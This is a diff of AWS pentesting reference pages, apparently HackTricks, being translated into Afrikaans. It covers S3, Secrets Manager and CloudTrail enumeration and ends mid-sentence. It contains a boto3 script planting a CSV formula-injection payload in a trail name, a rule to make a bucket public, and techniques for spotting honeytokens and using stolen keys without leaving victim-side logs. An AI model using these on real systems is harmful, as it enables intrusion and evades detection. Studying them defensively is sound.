-Client-side encryption with customer provided keys, CSE-C +Kliënt-kant enkripsie met kliënt verskaf sleutels, CSE-C -Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage. +Deur hierdie meganisme te gebruik, kan jy jou eie verskaf sleutels benut en 'n AWS-SDK kliënt gebruik om jou data te enkripteer voordat jy dit na S3 vir stoor stuur. -- Encryption: - - The client generates a DEK and encrypts the plaintext data - - Then, using it's own custom CMK it encrypts the DEK - - submit the encrypted data + encrypted DEK to S3 where it's stored -- Decryption: - - S3 sends the encrypted data and DEK - - As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data +- Enkripsie: +- Die kliënt genereer 'n DEK en enkripteer die platte data +- Dan, met behulp van sy eie pasgemaakte CMK, enkripteer dit die DEK +- dien die geënkripteerde data + geënkripteerde DEK aan S3 waar dit gestoor word +- Dekripsie: +- S3 stuur die geënkripteerde data en DEK +- Aangesien die kliënt reeds die CMK het wat gebruik is om die DEK te enkripteer, dekripteer dit die DEK en gebruik dan die platte DEK om die data te dekripteer
-### **Enumeration** - -One of the traditional main ways of compromising AWS orgs start by compromising buckets publicly accesible. **You can find** [**public buckets enumerators in this page**](../aws-unauthenticated-enum-access/#s3-buckets)**.** +### **Enumerasie** +Een van die tradisionele hoofmaniere om AWS-organisasies te kompromitteer, begin deur emmers wat publiek toeganklik is, te kompromitteer. **Jy kan** [**publieke emmer enumerators op hierdie bladsy vind**](../aws-unauthenticated-enum-access/#s3-buckets)**.** ```bash # Get buckets ACLs aws s3api get-bucket-acl --bucket @@ -184,28 +177,28 @@ aws s3api list-objects --bucket BUCKETNAME --output json --query "[sum(Contents[ aws s3api put-bucket-policy --policy file:///root/policy.json --bucket ##JSON policy example { - "Id": "Policy1568185116930", - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "Stmt1568184932403", - "Action": [ - "s3:ListBucket" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome", - "Principal": "*" - }, - { - "Sid": "Stmt1568185007451", - "Action": [ - "s3:GetObject" - ], - "Effect": "Allow", - "Resource": "arn:aws:s3:::welcome/*", - "Principal": "*" - } - ] +"Id": "Policy1568185116930", +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "Stmt1568184932403", +"Action": [ +"s3:ListBucket" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome", +"Principal": "*" +}, +{ +"Sid": "Stmt1568185007451", +"Action": [ +"s3:GetObject" +], +"Effect": "Allow", +"Resource": "arn:aws:s3:::welcome/*", +"Principal": "*" +} +] } # Update bucket ACL 
@@ -218,35 +211,34 @@ aws s3api put-object-acl --bucket --key flag --access-control-poli ##JSON ACL example ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved. { - "Owner": { - "DisplayName": "", - "ID": "" - }, - "Grants": [ - { - "Grantee": { - "Type": "Group", - "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" - }, - "Permission": "FULL_CONTROL" - } - ] +"Owner": { +"DisplayName": "", +"ID": "" +}, +"Grants": [ +{ +"Grantee": { +"Type": "Group", +"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers" +}, +"Permission": "FULL_CONTROL" +} +] } ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL ``` - ### dual-stack -You can access an S3 bucket through a dual-stack endpoint by using a virtual hosted-style or a path-style endpoint name. These are useful to access S3 through IPv6. +Jy kan toegang tot 'n S3-bucket verkry deur 'n dual-stack eindpunt te gebruik met 'n virtuele gehuisvesde styl of 'n padstyl eindpuntnaam. Hierdie is nuttig om S3 deur IPv6 te benader. -Dual-stack endpoints use the following syntax: +Dual-stack eindpunte gebruik die volgende sintaksis: - `bucketname.s3.dualstack.aws-region.amazonaws.com` - `s3.dualstack.aws-region.amazonaws.com/bucketname` ### Privesc -In the following page you can check how to **abuse S3 permissions to escalate privileges**: +Op die volgende bladsy kan jy kyk hoe om **S3-toestemmings te misbruik om voorregte te verhoog**: {{#ref}} ../aws-privilege-escalation/aws-s3-privesc.md 
@@ -274,22 +266,21 @@ In the following page you can check how to **abuse S3 permissions to escalate pr ### S3 HTTP Cache Poisoning Issue -[**According to this research**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) it was possible to cache the response of an arbitrary bucket as if it belonged to a different one. This could have been abused to change for example javascript file responses and compromise arbitrary pages using S3 to store static code. +[**Volgens hierdie navorsing**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) was dit moontlik om die antwoord van 'n arbitrĂȘre bucket te kas asof dit aan 'n ander behoort. Dit kon misbruik gewees het om byvoorbeeld javascript-lĂȘer-antwoorde te verander en arbitrĂȘre bladsye te kompromitteer wat S3 gebruik om statiese kode te stoor. ## Amazon Athena -Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**. +Amazon Athena is 'n interaktiewe vrae-diens wat dit maklik maak om **data** direk in Amazon Simple Storage Service (Amazon **S3**) **te analiseer** met standaard **SQL**. -You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from the logs, so you can query it. +Jy moet 'n **relationele DB-tabel voorberei** met die formaat van die inhoud wat in die gemonitorde S3-buckets gaan verskyn. En dan sal Amazon Athena in staat wees om die DB uit die logs te vul, sodat jy dit kan vra. -Amazon Athena supports the **ability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**. 
+Amazon Athena ondersteun die **vermoĂ« om S3-data wat reeds versleuteld is, te vra** en as dit geconfigureer is om dit te doen, **kan Athena ook die resultate van die vraag versleuteld wat dan in S3 gestoor kan word**. -**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**. +**Hierdie versleuteling van resultate is onafhanklik van die onderliggende gevraagde S3-data**, wat beteken dat selfs al is die S3-data nie versleuteld nie, kan die gevraagde resultate versleuteld wees. 'n Paar punte om bewus van te wees is dat Amazon Athena slegs data ondersteun wat **versleuteld** is met die **volgende S3-versleutelingmetodes**, **SSE-S3, SSE-KMS, en CSE-KMS**. -SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query. +SSE-C en CSE-E word nie ondersteun nie. Benewens dit, is dit belangrik om te verstaan dat Amazon Athena slegs vrae teen **versleutelde voorwerpe wat in dieselfde streek as die vraag self is** sal uitvoer. As jy S3-data moet vra wat met KMS versleuteld is, dan is spesifieke toestemmings nodig deur die Athena-gebruiker om hulle in staat te stel om die vraag uit te voer. ### Enumeration - ```bash # Get catalogs aws athena list-data-catalogs 
@@ -311,14 +302,9 @@ aws athena get-prepared-statement --statement-name --work-group # Run query aws athena start-query-execution --query-string ``` - -## References +## Verwysings - [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3) - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md index a50eaa24f..a8d2994e7 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md 
@@ -4,22 +4,21 @@ ## AWS Secrets Manager -AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications. +AWS Secrets Manager is ontwerp om **die gebruik van hard-gecodeerde geheime in toepassings te elimineer deur dit met 'n API-oproep te vervang**. Hierdie diens dien as 'n **gecentraliseerde berging vir al jou geheime**, wat verseker dat dit uniform bestuur word oor alle toepassings. -The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions. +Die bestuurder vereenvoudig die **proses om geheime te roteer**, wat die sekuriteitsposisie van sensitiewe data soos databasisakkrediteer verbeter. Daarbenewens kan geheime soos API-sleutels outomaties geroteer word met die integrasie van lambda-funksies. -The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies. +Die toegang tot geheime word noukeurig beheer deur middel van gedetailleerde IAM identiteit-gebaseerde beleide en hulpbron-gebaseerde beleide. -For granting access to secrets to a user from a different AWS account, it's necessary to: +Om toegang tot geheime aan 'n gebruiker van 'n ander AWS-rekening te verleen, is dit nodig om: -1. Authorize the user to access the secret. -2. Grant permission to the user to decrypt the secret using KMS. -3. Modify the Key policy to allow the external user to utilize it. +1. Die gebruiker te magtig om toegang tot die geheim te verkry. +2. Toestemming aan die gebruiker te verleen om die geheim met KMS te ontsleutel. +3. Die Sleutelbeleid te wysig om die eksterne gebruiker toe te laat om dit te gebruik. 
-**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.** +**AWS Secrets Manager integreer met AWS KMS om jou geheime binne AWS Secrets Manager te enkripteer.** ### **Enumeration** - ```bash aws secretsmanager list-secrets #Get metadata of all secrets aws secretsmanager list-secret-version-ids --secret-id # Get versions @@ -28,7 +27,6 @@ aws secretsmanager get-secret-value --secret-id # Get value aws secretsmanager get-secret-value --secret-id --version-id # Get value of a different version aws secretsmanager get-resource-policy --secret-id --secret-id ``` - ### Privesc {{#ref}} @@ -41,14 +39,10 @@ aws secretsmanager get-resource-policy --secret-id --secret-id ../aws-post-exploitation/aws-secrets-manager-post-exploitation.md {{#endref}} -### Persistence +### Persistensie {{#ref}} ../aws-persistence/aws-secrets-manager-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md index 8348ff098..413a6c2ba 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md @@ -1,6 +1 @@ -# AWS - Security & Detection Services - - - - - +# AWS - Sekuriteit & Deteksiedienste diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md index 780f52f6e..a9bc29069 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md 
@@ -4,111 +4,108 @@ ## **CloudTrail** -AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance. +AWS CloudTrail **registreer en monitor aktiwiteit binne jou AWS omgewing**. Dit vang gedetailleerde **gebeurtenislogs**, insluitend wie wat gedoen het, wanneer, en van waar, vir alle interaksies met AWS hulpbronne. Dit bied 'n oudit spoor van veranderinge en aksies, wat help met sekuriteitsanalise, nakoming ouditering, en hulpbron verandering opsporing. CloudTrail is noodsaaklik om gebruikers- en hulpbron gedrag te verstaan, om sekuriteitsposisies te verbeter, en om regulatoriese nakoming te verseker. -Each logged event contains: +Elke gelogde gebeurtenis bevat: -- The name of the called API: `eventName` -- The called service: `eventSource` -- The time: `eventTime` -- The IP address: `SourceIPAddress` -- The agent method: `userAgent`. Examples: - - Signing.amazonaws.com - From AWS Management Console - - console.amazonaws.com - Root user of the account - - lambda.amazonaws.com - AWS Lambda -- The request parameters: `requestParameters` -- The response elements: `responseElements` +- Die naam van die aangeroep API: `eventName` +- Die aangeroep diens: `eventSource` +- Die tyd: `eventTime` +- Die IP adres: `SourceIPAddress` +- Die agent metode: `userAgent`. 
Voorbeelde: +- Signing.amazonaws.com - Van AWS Bestuurskonsol +- console.amazonaws.com - Wortel gebruiker van die rekening +- lambda.amazonaws.com - AWS Lambda +- Die versoekparameters: `requestParameters` +- Die respons elemente: `responseElements` -Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\ -CloudTrails logs can be **aggregated across accounts and across regions.**\ -CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\ -When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events. +Gebeurtenisse word na 'n nuwe loglĂȘer **ongeveer elke 5 minute in 'n JSON-lĂȘer** geskryf, hulle word deur CloudTrail gehou en uiteindelik, loglĂȘers word **aan S3 afgelewer ongeveer 15min na**.\ +CloudTrail se logs kan **geaggregeer word oor rekeninge en oor streke.**\ +CloudTrail laat toe om **loglĂȘer integriteit te gebruik om te kan verifieer dat jou loglĂȘers onveranderd gebly het** sedert CloudTrail dit aan jou afgelewer het. Dit skep 'n SHA-256 hash van die logs binne 'n digest-lĂȘer. 'n sha-256 hash van die nuwe logs word elke uur geskep.\ +Wanneer 'n Trail geskep word, sal die gebeurteniskeuses jou toelaat om die trail aan te dui om te log: Bestuur, data of insig gebeurtenisse. -Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys. +Logs word in 'n S3-bucket gestoor. 
Standaard word Server Side Encryption (SSE-S3) gebruik, so AWS sal die inhoud ontsleutel vir die mense wat toegang het, maar vir bykomende sekuriteit kan jy SSE met KMS en jou eie sleutels gebruik. -The logs are stored in a **S3 bucket with this name format**: +Die logs word gestoor in 'n **S3-bucket met hierdie naamformaat**: - **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`** -- Being the BucketName: **`aws-cloudtrail-logs--`** -- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** +- Waar die BucketName is: **`aws-cloudtrail-logs--`** +- Voorbeeld: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`** -Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** +Binne elke gids sal elke log 'n **naam hĂȘ wat hierdie formaat volg**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`** -Log File Naming Convention +Log LĂȘer Naam Konvensie ![](<../../../../images/image (122).png>) -Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in: +Boonop, **digest-lĂȘers (om lĂȘer integriteit te kontroleer)** sal binne die **dieselfde bucket** wees in: ![](<../../../../images/image (195).png>) -### Aggregate Logs from Multiple Accounts +### Geaggregeerde Logs van Meerdere Rekeninge -- Create a Trial in the AWS account where you want the log files to be delivered to -- Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access -- Create a new Trail in the other AWS accounts and select to use the created bucket in step 1 +- Skep 'n Trail in die AWS rekening waar jy wil hĂȘ die loglĂȘers moet afgelewer word +- Pas toestemmings toe op die bestemmings S3-bucket wat kruis-rekening toegang vir CloudTrail toelaat en laat elke AWS rekening wat toegang 
benodig toe +- Skep 'n nuwe Trail in die ander AWS rekeninge en kies om die geskepte bucket in stap 1 te gebruik -However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account. +Egter, selfs al kan jy al die logs in dieselfde S3-bucket stoor, kan jy nie CloudTrail logs van meerdere rekeninge in 'n CloudWatch Logs wat aan 'n enkele AWS rekening behoort, aggregeer nie. > [!CAUTION] -> Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets. +> Onthou dat 'n rekening **verskillende Trails** van CloudTrail **geaktiveer** kan hĂȘ wat dieselfde (of verskillende) logs in verskillende buckets stoor. -### Cloudtrail from all org accounts into 1 +### Cloudtrail van alle org rekeninge in 1 -When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket: +Wanneer 'n CloudTrail geskep word, is dit moontlik om aan te dui om cloudtrail te aktiveer vir al die rekeninge in die org en om die logs in net 1 bucket te kry:
-This way you can easily configure CloudTrail in all the regions of all the accounts and centralize the logs in 1 account (that you should protect). +Op hierdie manier kan jy CloudTrail maklik in al die streke van al die rekeninge konfigureer en die logs in 1 rekening sentraliseer (wat jy moet beskerm). -### Log Files Checking - -You can check that the logs haven't been altered by running +### Log LĂȘers Kontrole +Jy kan kontroleer dat die logs nie verander is nie deur te loop ```javascript aws cloudtrail validate-logs --trail-arn --start-time [--end-time ] [--s3-bucket ] [--s3-prefix ] [--verbose] ``` - ### Logs to CloudWatch -**CloudTrail can automatically send logs to CloudWatch so you can set alerts that warns you when suspicious activities are performed.**\ -Note that in order to allow CloudTrail to send the logs to CloudWatch a **role** needs to be created that allows that action. If possible, it's recommended to use AWS default role to perform these actions. This role will allow CloudTrail to: +**CloudTrail kan outomaties logs na CloudWatch stuur sodat jy waarskuwings kan stel wat jou waarsku wanneer verdagte aktiwiteite uitgevoer word.**\ +Let daarop dat om CloudTrail toe te laat om die logs na CloudWatch te stuur, 'n **rol** geskep moet word wat daardie aksie toelaat. Indien moontlik, word dit aanbeveel om die AWS standaardrol te gebruik om hierdie aksies uit te voer. 
Hierdie rol sal CloudTrail toelaat om: -- CreateLogStream: This allows to create a CloudWatch Logs log streams -- PutLogEvents: Deliver CloudTrail logs to CloudWatch Logs log stream +- CreateLogStream: Dit laat jou toe om 'n CloudWatch Logs logstroom te skep +- PutLogEvents: Lewer CloudTrail logs aan die CloudWatch Logs logstroom ### Event History -CloudTrail Event History allows you to inspect in a table the logs that have been recorded: +CloudTrail Event History laat jou toe om in 'n tabel die logs wat opgeteken is, te inspekteer: ![](<../../../../images/image (89).png>) ### Insights -**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you’ll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever. +**CloudTrail Insights** analiseer outomaties **skrywe bestuur gebeurtenisse** van CloudTrail spore en **waarsku** jou oor **ongewone aktiwiteit**. Byvoorbeeld, as daar 'n toename in `TerminateInstance` gebeurtenisse is wat verskil van gevestigde baselines, sal jy dit as 'n Insight gebeurtenis sien. Hierdie gebeurtenisse maak **dit makliker om ongewone API aktiwiteit te vind en daarop te reageer** as ooit tevore. -The insights are stored in the same bucket as the CloudTrail logs in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight` +Die insigte word in dieselfde emmer as die CloudTrail logs gestoor in: `BucketName/AWSLogs/AccountID/CloudTrail-Insight` ### Security -| CloudTrail Log File Integrity |
  • Validate if logs have been tampered with (modified or deleted)
  • Uses digest files (create hash for each file)

    • SHA-256 hashing
    • SHA-256 with RSA for digital signing
    • private key owned by Amazon
  • Takes 1 hour to create a digest file (done on the hour every hour)
| +| CloudTrail Log File Integrity |
  • Verifieer of logs gemanipuleer is (gewysig of verwyder)
  • Gebruik digest lĂȘers (skep hash vir elke lĂȘer)

    • SHA-256 hashing
    • SHA-256 met RSA vir digitale ondertekening
    • privaat sleutel besit deur Amazon
  • Neem 1 uur om 'n digest lĂȘer te skep (gedoen op die uur elke uur)
| | ------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| Stop unauthorized access |
  • Use IAM policies and S3 bucket policies

    • security team —> admin access
    • auditors —> read only access
  • Use SSE-S3/SSE-KMS to encrypt the logs
| -| Prevent log files from being deleted |
  • Restrict delete access with IAM and bucket policies
  • Configure S3 MFA delete
  • Validate with Log File Validation
| +| Stop unauthorized access |
  • Gebruik IAM beleid en S3 emmer beleid

    • sekuriteitspan —> admin toegang
    • ouditeurs —> lees slegs toegang
  • Gebruik SSE-S3/SSE-KMS om die logs te enkripteer
| +| Prevent log files from being deleted |
  • Beperk verwyder toegang met IAM en emmer beleid
  • Konfigureer S3 MFA verwydering
  • Verifieer met Log File Validation
| ## Access Advisor -AWS Access Advisor relies on last 400 days AWS **CloudTrail logs to gather its insights**. CloudTrail captures a history of AWS API calls and related events made in an AWS account. Access Advisor utilizes this data to **show when services were last accessed**. By analyzing CloudTrail logs, Access Advisor can determine which AWS services an IAM user or role has accessed and when that access occurred. This helps AWS administrators make informed decisions about **refining permissions**, as they can identify services that haven't been accessed for extended periods and potentially reduce overly broad permissions based on real usage patterns. +AWS Access Advisor staat op die laaste 400 dae AWS **CloudTrail logs om sy insigte te versamel**. CloudTrail vang 'n geskiedenis van AWS API oproepe en verwante gebeurtenisse wat in 'n AWS rekening gemaak is. Access Advisor gebruik hierdie data om **te wys wanneer dienste laas toeganklik was**. Deur CloudTrail logs te analiseer, kan Access Advisor bepaal watter AWS dienste 'n IAM gebruiker of rol toeganklik gemaak het en wanneer daardie toegang plaasgevind het. Dit help AWS administrateurs om ingeligte besluite te neem oor **die verfyning van toestemmings**, aangesien hulle dienste kan identifiseer wat vir lang tydperke nie toeganklik was nie en moontlik oorbodige breë toestemmings kan verminder op grond van werklike gebruikspatrone. > [!TIP] -> Therefore, Access Advisor informs about **the unnecessary permissions being given to users** so the admin could remove them +> Daarom informeer Access Advisor oor **die onnodige toestemmings wat aan gebruikers gegee word** sodat die admin dit kan verwyder
## Actions ### Enumeration - ```bash # Get trails info aws cloudtrail list-trails 
@@ -125,125 +122,113 @@ aws cloudtrail list-event-data-stores aws cloudtrail list-queries --event-data-store aws cloudtrail get-query-results --event-data-store --query-id ``` - ### **CSV Injection** -It's possible to perform a CVS injection inside CloudTrail that will execute arbitrary code if the logs are exported in CSV and open with Excel.\ -The following code will generate log entry with a bad Trail name containing the payload: - +Dit is moontlik om 'n CVS-inspuiting binne CloudTrail uit te voer wat arbitrĂȘre kode sal uitvoer as die logs in CSV geĂ«ksporteer en met Excel oopgemaak word.\ +Die volgende kode sal 'n loginskrywing genereer met 'n slegte Trail-naam wat die payload bevat: ```python import boto3 payload = "=cmd|'/C calc'|''" client = boto3.client('cloudtrail') response = client.create_trail( - Name=payload, - S3BucketName="random" +Name=payload, +S3BucketName="random" ) print(response) ``` - -For more information about CSV Injections check the page: +Vir meer inligting oor CSV-inspuitings, kyk na die bladsy: {{#ref}} https://book.hacktricks.xyz/pentesting-web/formula-injection {{#endref}} -For more information about this specific technique check [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) +Vir meer inligting oor hierdie spesifieke tegniek, kyk [https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/](https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/) -## **Bypass Detection** +## **Om Detection te omseil** -### HoneyTokens **bypass** +### HoneyTokens **omseil** -Honeyokens are created to **detect exfiltration of sensitive information**. In case of AWS, they are **AWS keys whose use is monitored**, if something triggers an action with that key, then someone must have stolen that key. +Honeytokens word geskep om **die uitvloeiing van sensitiewe inligting te ontdek**. 
In die geval van AWS, is dit **AWS sleutels waarvan die gebruik gemonitor word**, as iets 'n aksie met daardie sleutel aktiveer, dan moet iemand daardie sleutel gesteel het. -However, Honeytokens like the ones created by [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) are either using recognizable account name or using the same AWS account ID for all their customers. Therefore, if you can get the account name and/or account ID without making Cloudtrail create any log, **you could know if the key is a honeytoken or not**. +E however, Honeytokens soos die wat geskep is deur [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren) gebruik Ăłf 'n herkenbare rekeningnaam Ăłf gebruik dieselfde AWS rekening ID vir al hul kliĂ«nte. Daarom, as jy die rekeningnaam en/of rekening ID kan kry sonder om Cloudtrail enige log te laat skep, **kan jy weet of die sleutel 'n honeytoken is of nie**. 
-[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) has some rules to detect if a key belongs to [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)**:** +[**Pacu**](https://github.com/RhinoSecurityLabs/pacu/blob/79cd7d58f7bff5693c6ae73b30a8455df6136cca/pacu/modules/iam__detect_honeytokens/main.py#L57) het 'n paar reĂ«ls om te detecteer of 'n sleutel aan [**Canarytokens**](https://canarytokens.org/generate)**,** [**SpaceCrab**](https://bitbucket.org/asecurityteam/spacecrab/issues?status=new&status=open)**,** [**SpaceSiren**](https://github.com/spacesiren/spacesiren)** behoort:** -- If **`canarytokens.org`** appears in the role name or the account ID **`534261010715`** appears in the error message. - - Testing them more recently, they are using the account **`717712589309`** and still has the **`canarytokens.com`** string in the name. -- If **`SpaceCrab`** appears in the role name in the error message -- **SpaceSiren** uses **uuids** to generate usernames: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` -- If the **name looks like randomly generated**, there are high probabilities that it's a HoneyToken. +- As **`canarytokens.org`** in die rolnaam verskyn of die rekening ID **`534261010715`** in die foutboodskap verskyn. +- Deur hulle meer onlangs te toets, gebruik hulle die rekening **`717712589309`** en het steeds die **`canarytokens.com`** string in die naam. +- As **`SpaceCrab`** in die rolnaam in die foutboodskap verskyn. +- **SpaceSiren** gebruik **uuids** om gebruikersname te genereer: `[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}` +- As die **naam lyk soos lukraak gegenereer**, is daar 'n hoĂ« waarskynlikheid dat dit 'n HoneyToken is. 
-#### Get the account ID from the Key ID - -You can get the **Account ID** from the **encoded** inside the **access key** as [**explained here**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) and check the account ID with your list of Honeytokens AWS accounts: +#### Kry die rekening ID van die Sleutel ID +Jy kan die **Rekening ID** kry van die **gecodeerde** binne die **toegangssleutel** soos [**hier verduidelik**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489) en die rekening ID met jou lys van Honeytokens AWS rekeninge nagaan: ```python import base64 import binascii def AWSAccount_from_AWSKeyID(AWSKeyID): - trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix - x = base64.b32decode(trimmed_AWSKeyID) #base32 decode - y = x[0:6] +trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix +x = base64.b32decode(trimmed_AWSKeyID) #base32 decode +y = x[0:6] - z = int.from_bytes(y, byteorder='big', signed=False) - mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) +z = int.from_bytes(y, byteorder='big', signed=False) +mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) - e = (z & mask)>>7 - return (e) +e = (z & mask)>>7 +return (e) print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) ``` - Check more information in the [**orginal research**](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489). -#### Do not generate a log +#### Moet nie 'n log genereer nie -The most effective technique for this is actually a simple one. Just use the key you just found to access some service inside your own attackers account. This will make **CloudTrail generate a log inside YOUR OWN AWS account and not inside the victims**. +Die mees effektiewe tegniek hiervoor is eintlik 'n eenvoudige een. Gebruik net die sleutel wat jy net gevind het om toegang te verkry tot 'n diens binne jou eie aanvallersrekening. 
Dit sal **CloudTrail 'n log binne JOU EIE AWS-rekening genereer en nie binne die slagoffers nie**. -The things is that the output will show you an error indicating the account ID and the account name so **you will be able to see if it's a Honeytoken**. +Die ding is dat die uitvoer jou 'n fout sal wys wat die rekening ID en die rekening naam aandui, sodat **jy sal kan sien of dit 'n Honeytoken is**. -#### AWS services without logs +#### AWS-dienste sonder logs -In the past there were some **AWS services that doesn't send logs to CloudTrail** (find a [list here](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Some of those services will **respond** with an **error** containing the **ARN of the key role** if someone unauthorised (the honeytoken key) try to access it. +In die verlede was daar 'n paar **AWS-dienste wat nie logs na CloudTrail stuur nie** (vind 'n [lys hier](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-unsupported-aws-services.html)). Sommige van daardie dienste sal **reageer** met 'n **fout** wat die **ARN van die sleutelrol** bevat as iemand ongeoorloof (die honeytoken sleutel) probeer om toegang te verkry. -This way, an **attacker can 